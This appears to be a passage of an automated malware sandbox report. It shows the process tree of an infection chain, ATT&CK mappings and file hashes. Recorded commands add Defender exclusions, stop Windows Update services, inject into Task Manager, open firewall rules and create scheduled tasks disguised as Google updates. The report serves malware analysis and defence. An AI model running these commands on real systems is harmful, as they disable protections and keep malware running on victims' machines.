              cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,9897252923422389749,3378452451361649956,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4184 /prefetch:1
              PID:5748
          [6] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,9897252923422389749,3378452451361649956,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5080 /prefetch:1
              PID:1348
          [6] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2108,9897252923422389749,3378452451361649956,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5604 /prefetch:8
              PID:4364
          [6] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,9897252923422389749,3378452451361649956,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4728 /prefetch:1
              PID:5276
          [6] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,9897252923422389749,3378452451361649956,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6644 /prefetch:1
              PID:6140
          [6] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,9897252923422389749,3378452451361649956,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6748 /prefetch:1
              PID:3580
          [6] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2108,9897252923422389749,3378452451361649956,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1896 /prefetch:2
              PID:5248
        [5] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/
            PID:4748
          [6] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ffdf1d746f8,0x7ffdf1d74708,0x7ffdf1d74718
              PID:4956
          [6] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1992,5664680323046763604,9677910988212657655,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2296 /prefetch:3
              PID:2880
          [6] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1992,5664680323046763604,9677910988212657655,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2076 /prefetch:2
              PID:5060
  [2] C:\Users\Admin\AppData\Local\Temp\43DA.exe
      cmd: C:\Users\Admin\AppData\Local\Temp\43DA.exe
      - Executes dropped EXE
      - Adds Run key to start application
      PID:5528
    [3] C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\tN1mE9TX.exe
        cmd: C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\tN1mE9TX.exe
        - Executes dropped EXE
        - Adds Run key to start application
        PID:6032
      [4] C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\vC6cO6Ik.exe
          cmd: C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\vC6cO6Ik.exe
          - Executes dropped EXE
          - Adds Run key to start application
          PID:4532
        [5] C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Wj5od8jc.exe
            cmd: C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Wj5od8jc.exe
            - Executes dropped EXE
            - Adds Run key to start application
            PID:3020
          [6] C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\dk2qX3md.exe
              cmd: C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\dk2qX3md.exe
              - Executes dropped EXE
              - Adds Run key to start application
              PID:6072
            [7] C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1Qi55hp5.exe
                cmd: C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1Qi55hp5.exe
                - Executes dropped EXE
                - Suspicious use of SetThreadContext
                PID:5148
              [8] C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                  cmd: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                  PID:2372
              [8] C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                  cmd: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                  PID:4760
                [9] C:\Windows\SysWOW64\WerFault.exe
                    cmd: C:\Windows\SysWOW64\WerFault.exe -u -p 4760 -s 204
                    - Program crash
                    PID:4944
            [7] C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2AB154Bn.exe
                cmd: C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2AB154Bn.exe
                - Executes dropped EXE
                PID:3560
  [2] C:\Users\Admin\AppData\Local\Temp\44A6.exe
      cmd: C:\Users\Admin\AppData\Local\Temp\44A6.exe
      - Executes dropped EXE
      PID:3972
  [2] C:\Windows\system32\cmd.exe
      cmd: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\463D.bat" "
      PID:6100
    [3] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/login
        PID:5484
      [4] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffdf1d746f8,0x7ffdf1d74708,0x7ffdf1d74718
          PID:5952
    [3] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/
        - Executes dropped EXE
        PID:5144
      [4] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffdf1d746f8,0x7ffdf1d74708,0x7ffdf1d74718
          PID:5808
  [2] C:\Users\Admin\AppData\Local\Temp\470A.exe
      cmd: C:\Users\Admin\AppData\Local\Temp\470A.exe
      - Executes dropped EXE
      PID:5784
  [2] C:\Users\Admin\AppData\Local\Temp\4891.exe
      cmd: C:\Users\Admin\AppData\Local\Temp\4891.exe
      - Modifies Windows Defender Real-time Protection settings
      - Executes dropped EXE
      - Windows security modification
      - Suspicious use of AdjustPrivilegeToken
      PID:5628
  [2] C:\Users\Admin\AppData\Local\Temp\4A77.exe
      cmd: C:\Users\Admin\AppData\Local\Temp\4A77.exe
      - Executes dropped EXE
      PID:2112
  [2] C:\Users\Admin\AppData\Local\Temp\4C4C.exe
      cmd: C:\Users\Admin\AppData\Local\Temp\4C4C.exe
      - Executes dropped EXE
      - Drops file in Windows directory
      - Suspicious use of AdjustPrivilegeToken
      PID:4020
  [2] C:\Users\Admin\AppData\Local\Temp\7DAE.exe
      cmd: C:\Users\Admin\AppData\Local\Temp\7DAE.exe
      - Checks computer location settings
      - Executes dropped EXE
      PID:5924
    [3] C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
        cmd: "C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
        - Executes dropped EXE
        - Suspicious use of SetThreadContext
        PID:5780
      [4] C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
          cmd: "C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
          - Executes dropped EXE
          - Checks SCSI registry key(s)
          - Suspicious behavior: MapViewOfSection
          PID:5544
    [3] C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
        cmd: "C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"
        - Executes dropped EXE
        PID:5772
      [4] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          cmd: powershell -nologo -noprofile
          PID:5496
      [4] C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
          cmd: "C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"
          - Executes dropped EXE
          - Adds Run key to start application
          - Checks for VirtualBox DLLs, possible anti-VM trick
          - Drops file in Windows directory
          - Modifies data under HKEY_USERS
          PID:3552
        [5] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            cmd: powershell -nologo -noprofile
            - Drops file in System32 directory
            - Modifies data under HKEY_USERS
            PID:3696
        [5] C:\Windows\system32\cmd.exe
            cmd: C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
            PID:1944
          [6] C:\Windows\system32\netsh.exe
              cmd: netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
              - Modifies Windows Firewall
              PID:572
        [5] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            cmd: powershell -nologo -noprofile
            - Drops file in System32 directory
            - Modifies data under HKEY_USERS
            PID:5960
        [5] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            cmd: powershell -nologo -noprofile
            - Drops file in System32 directory
            - Modifies data under HKEY_USERS
            PID:2972
        [5] C:\Windows\rss\csrss.exe
            cmd: C:\Windows\rss\csrss.exe
            - Executes dropped EXE
            - Adds Run key to start application
            - Manipulates WinMonFS driver.
            - Drops file in Windows directory
            PID:4684
          [6] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              cmd: powershell -nologo -noprofile
              - Drops file in System32 directory
              - Modifies data under HKEY_USERS
              PID:5972
          [6] C:\Windows\SYSTEM32\schtasks.exe
              cmd: schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
              - DcRat
              - Creates scheduled task(s)
              PID:1808
          [6] C:\Windows\SYSTEM32\schtasks.exe
              cmd: schtasks /delete /tn ScheduledUpdate /f
              PID:4536
          [6] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              cmd: powershell -nologo -noprofile
              - Drops file in System32 directory
              - Modifies data under HKEY_USERS
              PID:416
          [6] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              cmd: powershell -nologo -noprofile
              - Drops file in System32 directory
              - Modifies data under HKEY_USERS
              PID:5980
          [6] C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
              cmd: C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
              - Executes dropped EXE
              PID:5620
          [6] C:\Windows\SYSTEM32\schtasks.exe
              cmd: schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
              - DcRat
              - Creates scheduled task(s)
              PID:1724
          [6] C:\Windows\windefender.exe
              cmd: "C:\Windows\windefender.exe"
              - Executes dropped EXE
              PID:5008
            [7] C:\Windows\SysWOW64\cmd.exe
                cmd: cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
                PID:5540
              [8] C:\Windows\SysWOW64\sc.exe
                  cmd: sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
                  - Launches sc.exe
                  PID:4372
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\kos4.exe"C:\Users\Admin\AppData\Local\Temp\kos4.exe"3⤵PID:3484
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"4⤵
- Executes dropped EXE
PID:3736 -
C:\Users\Admin\AppData\Local\Temp\is-MK6NS.tmp\LzmwAqmV.tmp"C:\Users\Admin\AppData\Local\Temp\is-MK6NS.tmp\LzmwAqmV.tmp" /SL5="$D0206,6502186,54272,C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
PID:1032 -
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /F /TN "Z1026-1"6⤵PID:5560
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV17⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3484
-
-
-
C:\Program Files (x86)\Drive Tools\zDriveTools.exe"C:\Program Files (x86)\Drive Tools\zDriveTools.exe" -i6⤵
- Executes dropped EXE
PID:6128
-
-
C:\Program Files (x86)\Drive Tools\zDriveTools.exe"C:\Program Files (x86)\Drive Tools\zDriveTools.exe" -s6⤵
- Executes dropped EXE
PID:964
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\system32\schtasks.exe" /Query6⤵PID:4660
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\latestX.exe"C:\Users\Admin\AppData\Local\Temp\latestX.exe"3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Executes dropped EXE
- Drops file in Program Files directory
PID:2308
-
-
-
C:\Users\Admin\AppData\Local\Temp\7FD2.exeC:\Users\Admin\AppData\Local\Temp\7FD2.exe2⤵
- Executes dropped EXE
- Adds Run key to start application
PID:5988
-
-
C:\Users\Admin\AppData\Local\Temp\81E6.exeC:\Users\Admin\AppData\Local\Temp\81E6.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3660 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3660 -s 7963⤵
- Program crash
PID:2472
-
-
-
C:\Users\Admin\AppData\Local\Temp\906E.exeC:\Users\Admin\AppData\Local\Temp\906E.exe2⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
PID:5748 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:3632
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3632 -s 5724⤵
- Program crash
PID:224
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\D383.exeC:\Users\Admin\AppData\Local\Temp\D383.exe2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3852 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe3⤵PID:5620
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵PID:4060
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc2⤵PID:5204
-
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:1660
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:5380
-
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:5824
-
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:3972
-
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:456
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }2⤵PID:6020
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵PID:5168
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵PID:4756
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵PID:1724
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵PID:4292
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵PID:1296
-
-
-
C:\Windows\System32\schtasks.exeC:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"2⤵PID:4304
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:1632
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc2⤵PID:1972
-
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:5560
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:5912
-
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:868
-
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:5524
-
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:5976
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵PID:3956
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵PID:224
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵PID:1408
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵PID:5476
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵PID:1500
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }2⤵
- Modifies data under HKEY_USERS
PID:3760
-
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe2⤵PID:4584
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe2⤵PID:2052
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 884 -ip 8841⤵PID:4148
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:4780
-
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exeC:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe1⤵PID:5144
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:5344
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 4760 -ip 47601⤵PID:6024
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 3660 -ip 36601⤵PID:5984
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 3632 -ip 36321⤵PID:5904
-
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exeC:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe1⤵
- Executes dropped EXE
PID:2136
-
C:\Program Files\Google\Chrome\updater.exe"C:\Program Files\Google\Chrome\updater.exe"1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Executes dropped EXE
PID:1040
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:4296
-
C:\Windows\windefender.exeC:\Windows\windefender.exe1⤵
- Executes dropped EXE
PID:5876
-
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exeC:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe1⤵PID:5976
Network
MITRE ATT&CK Enterprise v15
Persistence
- Boot or Logon Autostart Execution (1): Registry Run Keys / Startup Folder (1)
- Create or Modify System Process (3): Windows Service (3)
- Scheduled Task/Job (1)
Privilege Escalation
- Boot or Logon Autostart Execution (1): Registry Run Keys / Startup Folder (1)
- Create or Modify System Process (3): Windows Service (3)
- Scheduled Task/Job (1)
Downloads
-
Filesize
226B
MD5916851e072fbabc4796d8916c5131092
SHA1d48a602229a690c512d5fdaf4c8d77547a88e7a2
SHA2567e750c904c43d27c89e55af809a679a96c0bb63fc511006ffbceffc2c7f6fb7d
SHA51207ce4c881d6c411cac0b62364377e77950797c486804fb10d00555458716e3c47b1efc0d1f37e4cc3b7e6565bb402ca01c7ea8c963f9f9ace941a6e3883d2521
-
Filesize
152B
MD516e56f576d6ace85337e8c07ec00c0bf
SHA15c9579bb4975c93a69d1336eed5f05013dc35b9c
SHA2567796a7ba79148fc3cb46e4bbca48094376371ca9dd66f0810f7797c5e24158f5
SHA51269e89f39fa6438a74a48985387cd2e3e003858b0855ee6cd03abf6967674503b98b90573c784b4cf785b9cca594d3c8762f92def24e2bf51374ef5a00921e5e2
-
Filesize
152B
MD50629525c94f6548880f5f3a67846755e
SHA140ef667fc04bb1c0ae4bf2c17ded88594f0f4423
SHA256812576f4a24f399abbd54b83ba7f404f021d4a7d2ec0fd2f988ebf4cbf8477ee
SHA512f74d2e4a65a152f46852eb78dd70a958fdfb8c14e060ca41ffa783b7362e44659cc5fc73f59f3edb1f1d817000b85de7c1860512aa65d937eb5a0a8d9e5890fa
-
Filesize
152B
MD50629525c94f6548880f5f3a67846755e
SHA140ef667fc04bb1c0ae4bf2c17ded88594f0f4423
SHA256812576f4a24f399abbd54b83ba7f404f021d4a7d2ec0fd2f988ebf4cbf8477ee
SHA512f74d2e4a65a152f46852eb78dd70a958fdfb8c14e060ca41ffa783b7362e44659cc5fc73f59f3edb1f1d817000b85de7c1860512aa65d937eb5a0a8d9e5890fa
-
Filesize
152B
MD50629525c94f6548880f5f3a67846755e
SHA140ef667fc04bb1c0ae4bf2c17ded88594f0f4423
SHA256812576f4a24f399abbd54b83ba7f404f021d4a7d2ec0fd2f988ebf4cbf8477ee
SHA512f74d2e4a65a152f46852eb78dd70a958fdfb8c14e060ca41ffa783b7362e44659cc5fc73f59f3edb1f1d817000b85de7c1860512aa65d937eb5a0a8d9e5890fa
-
Filesize
152B
MD50629525c94f6548880f5f3a67846755e
SHA140ef667fc04bb1c0ae4bf2c17ded88594f0f4423
SHA256812576f4a24f399abbd54b83ba7f404f021d4a7d2ec0fd2f988ebf4cbf8477ee
SHA512f74d2e4a65a152f46852eb78dd70a958fdfb8c14e060ca41ffa783b7362e44659cc5fc73f59f3edb1f1d817000b85de7c1860512aa65d937eb5a0a8d9e5890fa
-
Filesize
152B
MD50629525c94f6548880f5f3a67846755e
SHA140ef667fc04bb1c0ae4bf2c17ded88594f0f4423
SHA256812576f4a24f399abbd54b83ba7f404f021d4a7d2ec0fd2f988ebf4cbf8477ee
SHA512f74d2e4a65a152f46852eb78dd70a958fdfb8c14e060ca41ffa783b7362e44659cc5fc73f59f3edb1f1d817000b85de7c1860512aa65d937eb5a0a8d9e5890fa
